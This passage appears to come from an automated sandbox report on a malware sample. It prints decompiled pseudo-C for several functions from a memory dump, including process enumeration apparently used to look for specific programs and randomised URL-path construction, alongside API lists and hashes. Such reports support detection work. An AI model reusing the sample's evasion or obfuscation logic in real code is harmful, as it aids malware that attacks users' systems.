                                                          • SetEvent.KERNEL32(00000000,?,?,?,04C052AA,?,00000001,?,00000002,?,?,04C05D5E,?), ref: 04C0370F
                                                          • Sleep.KERNEL32(00000BB8,?,?,?,04C052AA,?,00000001,?,00000002,?,?,04C05D5E,?), ref: 04C0371A
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,04C052AA,?,00000001,?,00000002,?,?,04C05D5E,?), ref: 04C03721
                                                            • Part of subcall function 04C0A446: WaitForSingleObject.KERNEL32(00000000,?,?,?,04C03741,?,04C03741,?,?,?,?,?,04C03741,?), ref: 04C0A520
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                                          • String ID:
                                                          • API String ID: 2559942907-0
                                                          • Opcode ID: 3c90dd86cdd04e94373b3c19f0ff4c682b5e94e6bc07ffef7f6ee9e1636b39f6
                                                          • Instruction ID: b61da9c434276189d3ec726716eefb52fccf2058d3fc643abba9a16203e98f25
                                                          • Opcode Fuzzy Hash: 3c90dd86cdd04e94373b3c19f0ff4c682b5e94e6bc07ffef7f6ee9e1636b39f6
                                                          • Instruction Fuzzy Hash: C221DAB6D00259ABDB10BFE989849AEB37EEB04354B05C425EE11E7190D734BA84CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04C06545, Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 78%
                                                          			E04C06545(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E04C0A71F(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                                                          0x04c06551
                                                          0x04c06555
                                                          0x04c06556
                                                          0x04c06557
                                                          0x04c06559
                                                          0x04c0655b
                                                          0x04c0655e
                                                          0x04c06563
                                                          0x04c065fa
                                                          0x04c06601
                                                          0x04c06601
                                                          0x04c0656c
                                                          0x04c06573
                                                          0x04c06583
                                                          0x04c06583
                                                          0x04c06589
                                                          0x04c0658b
                                                          0x04c06590
                                                          0x04c06599
                                                          0x04c0659f
                                                          0x04c065a4
                                                          0x04c065af
                                                          0x04c065b3
                                                          0x04c065b5
                                                          0x04c065b6
                                                          0x04c065bf
                                                          0x04c065c3
                                                          0x04c065d4
                                                          0x04c065c5
                                                          0x04c065ca
                                                          0x04c065cf
                                                          0x04c065de
                                                          0x04c065de
                                                          0x04c065b3
                                                          0x04c065e4
                                                          0x04c065ea
                                                          0x04c065ea
                                                          0x04c065f3
                                                          0x04c065f8
                                                          0x04c065f8
                                                          0x00000000

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: FreeSleepStringlstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 1198164300-0
                                                          • Opcode ID: a7e6e4765501be1338ce68182f18c84dd789d72fce95e1f5361584bafe3ce77a
                                                          • Instruction ID: 27671b846ff493bc4773af6120eadf3d5cc45583fd2aefefc050b657c78ac7ce
                                                          • Opcode Fuzzy Hash: a7e6e4765501be1338ce68182f18c84dd789d72fce95e1f5361584bafe3ce77a
                                                          • Instruction Fuzzy Hash: 59218079A00219EFDB11DFA8C88499EBBF9FF58304B108169E906E7244EB30EB51DB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04C017E5, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 68%
                                                          			E04C017E5(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x4c0d238, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x4c0d250; // 0x0
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x4c0d250 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                                                          0x04c017ed
                                                          0x04c017f0
                                                          0x04c017f6
                                                          0x04c0180e
                                                          0x04c01810
                                                          0x04c01815
                                                          0x04c01817
                                                          0x04c0181a
                                                          0x04c0181c
                                                          0x04c0181f
                                                          0x04c01821
                                                          0x04c01821
                                                          0x04c01823
                                                          0x04c0182e
                                                          0x04c01833
                                                          0x04c01844
                                                          0x04c0184c
                                                          0x04c01851
                                                          0x04c01854
                                                          0x04c01857
                                                          0x04c01859
                                                          0x04c0185c
                                                          0x04c0185f
                                                          0x04c0185f
                                                          0x04c01862
                                                          0x04c0186d
                                                          0x04c01872
                                                          0x04c0187c

                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04C01C49,00000000,?,?,04C020C2,?,068895B0), ref: 04C017F0
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 04C01808
                                                          • memcpy.NTDLL(00000000,?,-00000008,?,?,?,04C01C49,00000000,?,?,04C020C2,?,068895B0), ref: 04C0184C
                                                          • memcpy.NTDLL(00000001,?,00000001), ref: 04C0186D
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: memcpy$AllocateHeaplstrlen
                                                          • String ID:
                                                          • API String ID: 1819133394-0
                                                          • Opcode ID: fc84d7c4e63fb24f8cc959b04aabdf37f95848aa84283f7034f252b540a29f88
                                                          • Instruction ID: 41c69ea68de17f6a64f39c7a556782d59401d0f6ee221080e6493f3438f68f86
                                                          • Opcode Fuzzy Hash: fc84d7c4e63fb24f8cc959b04aabdf37f95848aa84283f7034f252b540a29f88
                                                          • Instruction Fuzzy Hash: 9E110676A00114AFD7148FA9DC84EAEBBEEEB80360B064276F5059B180EB749E40C7A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04C0486F, Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 53%
                                                          			E04C0486F(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E04C0A71F(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0x4c0c284);
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0x4c0c284);
						}
						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
				}
				return 0;
			}










                                                          0x04c0487a
                                                          0x04c0487e
                                                          0x04c04880
                                                          0x04c04881
                                                          0x04c04889
                                                          0x04c04889
                                                          0x04c0488d
                                                          0x00000000
                                                          0x00000000
                                                          0x04c04884
                                                          0x04c04885
                                                          0x04c04888
                                                          0x04c04888
                                                          0x04c04895
                                                          0x04c0489a
                                                          0x04c048a0
                                                          0x04c048a8
                                                          0x04c048ae
                                                          0x04c048b0
                                                          0x04c048b5
                                                          0x04c048b9
                                                          0x04c048bb
                                                          0x04c048be
                                                          0x04c048c5
                                                          0x04c048c5
                                                          0x04c048cf
                                                          0x04c048d2
                                                          0x04c048d3
                                                          0x04c048d5
                                                          0x04c048e1
                                                          0x04c048e1
                                                          0x04c048ee

                                                          APIs
                                                          • StrChrA.SHLWAPI(?,00000020,00000000,068895AC,?,04C05D25,?,04C0243F,068895AC,?,04C05D25), ref: 04C04889
                                                          • StrTrimA.SHLWAPI(?,04C0C284,00000002,?,04C05D25,?,04C0243F,068895AC,?,04C05D25), ref: 04C048A8
                                                          • StrChrA.SHLWAPI(?,00000020,?,04C05D25,?,04C0243F,068895AC,?,04C05D25), ref: 04C048B3
                                                          • StrTrimA.SHLWAPI(00000001,04C0C284,?,04C05D25,?,04C0243F,068895AC,?,04C05D25), ref: 04C048C5
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Trim
                                                          • String ID:
                                                          • API String ID: 3043112668-0
                                                          • Opcode ID: ef2437a08f08416cfd106b5462f76682eb334ed84f05992e5c49fa90191012cc
                                                          • Instruction ID: d9df48db7513d1ad6972d4c8db4c3b7a4018fb1344dd8d145ba2a08c5cf431f9
                                                          • Opcode Fuzzy Hash: ef2437a08f08416cfd106b5462f76682eb334ed84f05992e5c49fa90191012cc
                                                          • Instruction Fuzzy Hash: EB012875601352AFD2349F6A8C48F37BF9DFB45A64F118B18FA42C7280EB60E80196E4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04C0A65C, Relevance: 6.0, APIs: 4, Instructions: 41processCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 68%
                                                          			E04C0A65C() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x4c0d2a8; // 0x1c7a5a8
						_t2 = _t9 + 0x4c0ee34; // 0x73617661
						_push( &_v264);
						if( *0x4c0d0fc() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}









                                                          0x04c0a667
                                                          0x04c0a671
                                                          0x04c0a675
                                                          0x04c0a67f
                                                          0x04c0a6b0
                                                          0x04c0a686
                                                          0x04c0a68b
                                                          0x04c0a698
                                                          0x04c0a6a1
                                                          0x04c0a6b8
                                                          0x04c0a6a3
                                                          0x04c0a6ab
                                                          0x00000000
                                                          0x04c0a6ab
                                                          0x04c0a6b9
                                                          0x04c0a6ba
                                                          0x00000000
                                                          0x04c0a6ba
                                                          0x00000000
                                                          0x04c0a6b4
                                                          0x04c0a6c0
                                                          0x04c0a6c5

                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04C0A66C
                                                          • Process32First.KERNEL32(00000000,?), ref: 04C0A67F
                                                          • Process32Next.KERNEL32(00000000,?), ref: 04C0A6AB
                                                          • CloseHandle.KERNEL32(00000000), ref: 04C0A6BA
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                          • String ID:
                                                          • API String ID: 420147892-0
                                                          • Opcode ID: 31391a27aa63fc6630b7ff4fc8699c14f16bee27d78396554578284d86be7247
                                                          • Instruction ID: 719dacf02dd970789633be172438d80a9cb5695f9b553b5765b74fbdf1921644
                                                          • Opcode Fuzzy Hash: 31391a27aa63fc6630b7ff4fc8699c14f16bee27d78396554578284d86be7247
                                                          • Instruction Fuzzy Hash: 19F0BB362012246BE720BAA69C48EEF77BEDBC5314F058151E615D3180EE35EE858AB5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04C06840, Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E04C06840(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}






                                                          0x04c0684a
                                                          0x04c0684e
                                                          0x04c06863
                                                          0x04c06865
                                                          0x04c0686a
                                                          0x04c06870
                                                          0x04c06872
                                                          0x04c06877
                                                          0x04c06882
                                                          0x04c06879
                                                          0x04c06879
                                                          0x04c06879
                                                          0x04c06877
                                                          0x04c06890

                                                          APIs
                                                          • memset.NTDLL ref: 04C0684E
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,74B481D0), ref: 04C06863
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 04C06870
                                                          • CloseHandle.KERNEL32(?), ref: 04C06882
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: CreateEvent$CloseHandlememset
                                                          • String ID:
                                                          • API String ID: 2812548120-0
                                                          • Opcode ID: 090987b5fef60ff590c7ce4d7810cedec451d80aadab16e54b79fd790f9a8e78
                                                          • Instruction ID: bd04692b9a39e3310421ffdde7183083522c57b7d4d9e455ff0f3e10ed7e872f
                                                          • Opcode Fuzzy Hash: 090987b5fef60ff590c7ce4d7810cedec451d80aadab16e54b79fd790f9a8e78
                                                          • Instruction Fuzzy Hash: 19F05EF52043087FD3246F26DCC4C27BBADEB9129DB128B2EF14282151D676A9598B60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04C023F4, Relevance: 6.0, APIs: 4, Instructions: 29sleepmemoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 50%
                                                          			E04C023F4(void** __esi) {
				char* _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0x4c0d32c; // 0x68895b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x4c0d32c; // 0x68895b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0x4c0d030) {
					HeapFree( *0x4c0d238, 0, _t8);
				}
				_t14[1] = E04C0486F(_v0, _t14);
				_t11 =  *0x4c0d32c; // 0x68895b0
				_t12 = _t11 + 0x40;
				__imp__(_t12);
				return _t12;
			}










                                                          0x04c023f4
                                                          0x04c023f4
                                                          0x04c023fd
                                                          0x04c0240d
                                                          0x04c0240d
                                                          0x04c02412
                                                          0x04c02417
                                                          0x00000000
                                                          0x00000000
                                                          0x04c02407
                                                          0x04c02407
                                                          0x04c02419
                                                          0x04c0241d
                                                          0x04c0242f
                                                          0x04c0242f
                                                          0x04c0243f
                                                          0x04c02442
                                                          0x04c02447
                                                          0x04c0244b
                                                          0x04c02451

                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(06889570), ref: 04C023FD
                                                          • Sleep.KERNEL32(0000000A,?,04C05D25), ref: 04C02407
                                                          • HeapFree.KERNEL32(00000000,00000000,?,04C05D25), ref: 04C0242F
                                                          • RtlLeaveCriticalSection.NTDLL(06889570), ref: 04C0244B
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                          • String ID:
                                                          • API String ID: 58946197-0
                                                          • Opcode ID: 3905e6a5c7754a59aa2bf47c0a289368c4aee750607ed87493a8d2e1baf4c86d
                                                          • Instruction ID: a56d85aac37720e2c0f4a5a94a42b1a14f3be27094f0f951cbe8e6fc9aea9a99
                                                          • Opcode Fuzzy Hash: 3905e6a5c7754a59aa2bf47c0a289368c4aee750607ed87493a8d2e1baf4c86d
                                                          • Instruction Fuzzy Hash: A2F058786042409BE7289FE8E888F2A77F9EF08748B46C500F643C6290C738EC84CB25
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04C01B42, Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E04C01B42() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x4c0d26c; // 0x31c
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x4c0d2bc; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x4c0d26c; // 0x31c
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x4c0d238; // 0x6490000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                                                          0x04c01b42
                                                          0x04c01b49
                                                          0x04c01b93
                                                          0x04c01b95
                                                          0x04c01b95
                                                          0x04c01b4d
                                                          0x04c01b53
                                                          0x04c01b58
                                                          0x04c01b5c
                                                          0x04c01b62
                                                          0x04c01b69
                                                          0x00000000
                                                          0x00000000
                                                          0x04c01b6b
                                                          0x04c01b70
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x04c01b70
                                                          0x04c01b72
                                                          0x04c01b7a
                                                          0x04c01b7d
                                                          0x04c01b7d
                                                          0x04c01b83
                                                          0x04c01b8a
                                                          0x04c01b8d
                                                          0x04c01b8d
                                                          0x00000000

                                                          APIs
                                                          • SetEvent.KERNEL32(0000031C,00000001,04C04F0E), ref: 04C01B4D
                                                          • SleepEx.KERNEL32(00000064,00000001), ref: 04C01B5C
                                                          • CloseHandle.KERNEL32(0000031C), ref: 04C01B7D
                                                          • HeapDestroy.KERNEL32(06490000), ref: 04C01B8D
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: CloseDestroyEventHandleHeapSleep
                                                          • String ID:
                                                          • API String ID: 4109453060-0
                                                          • Opcode ID: 18a1fa22ed3f2993c4622ccbc6aae58084dcf0cdba38a924653b5e3129ca4392
                                                          • Instruction ID: 7abb18df9ce0b0ed92e6045cc175913838c64fa05d382d70f7266033da851b55
                                                          • Opcode Fuzzy Hash: 18a1fa22ed3f2993c4622ccbc6aae58084dcf0cdba38a924653b5e3129ca4392
                                                          • Instruction Fuzzy Hash: A4F030B9A0131197EB145B75E848F267BDDEB04B6170E8310B806D72C0EF39EE80D660
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04C06702, Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 37%
                                                          			E04C06702() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x4c0d32c; // 0x68895b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x4c0d32c; // 0x68895b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x4c0d32c; // 0x68895b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x4c0e81a) {
					HeapFree( *0x4c0d238, 0, _t10);
					_t7 =  *0x4c0d32c; // 0x68895b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                                                          0x04c06702
                                                          0x04c0670b
                                                          0x04c0671b
                                                          0x04c0671b
                                                          0x04c06720
                                                          0x04c06725
                                                          0x00000000
                                                          0x00000000
                                                          0x04c06715
                                                          0x04c06715
                                                          0x04c06727
                                                          0x04c0672c
                                                          0x04c06730
                                                          0x04c06743
                                                          0x04c06749
                                                          0x04c06749
                                                          0x04c06752
                                                          0x04c06754
                                                          0x04c06758
                                                          0x04c0675e

                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(06889570), ref: 04C0670B
                                                          • Sleep.KERNEL32(0000000A,?,04C05D25), ref: 04C06715
                                                          • HeapFree.KERNEL32(00000000,?,?,04C05D25), ref: 04C06743
                                                          • RtlLeaveCriticalSection.NTDLL(06889570), ref: 04C06758
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                          • String ID:
                                                          • API String ID: 58946197-0
                                                          • Opcode ID: 5787c17ddc18d168e062046fe4a5ac5e5a7214a9771b10bf4919b7db9e15b750
                                                          • Instruction ID: 20b1a2a67321c6b9a3b8db6c979c37a5423c3a43cf6f543a45ce20026d098498
                                                          • Opcode Fuzzy Hash: 5787c17ddc18d168e062046fe4a5ac5e5a7214a9771b10bf4919b7db9e15b750
                                                          • Instruction Fuzzy Hash: 46F0D4787001009BE7188FA8D999F2977F6EB08B04B068109FA03DB2A0C738EC90CA10
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04C05AF1, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 58%
                                                          			E04C05AF1(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E04C0A71F(_t2);
				if(_t34 != 0) {
					_t30 = E04C0A71F(_t28);
					if(_t30 == 0) {
						E04C0A734(_t34);
					} else {
						_t39 = _a4;
						_t22 = E04C0A782(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E04C0A782(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                                                          0x04c05af1
                                                          0x04c05afb
                                                          0x04c05afd
                                                          0x04c05b03
                                                          0x04c05b03
                                                          0x04c05b0c
                                                          0x04c05b10
                                                          0x04c05b1c
                                                          0x04c05b20
                                                          0x04c05b94
                                                          0x04c05b22
                                                          0x04c05b22
                                                          0x04c05b26
                                                          0x04c05b2b
                                                          0x04c05b30
                                                          0x04c05b4a
                                                          0x04c05b39
                                                          0x04c05b39
                                                          0x04c05b3d
                                                          0x04c05b40
                                                          0x04c05b45
                                                          0x04c05b45
                                                          0x04c05b4f
                                                          0x04c05b77
                                                          0x04c05b7d
                                                          0x04c05b80
                                                          0x04c05b51
                                                          0x04c05b53
                                                          0x04c05b5b
                                                          0x04c05b66
                                                          0x04c05b6b
                                                          0x04c05b6b
                                                          0x04c05b87
                                                          0x04c05b8e
                                                          0x04c05b8f
                                                          0x04c05b8f
                                                          0x04c05b20
                                                          0x04c05b9f

                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,00000008,?,74B04D40,?,?,04C03E08,?,?,?,?,00000102,04C067B8,?,?,00000000), ref: 04C05AFD
                                                            • Part of subcall function 04C0A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04C05595), ref: 04C0A72B
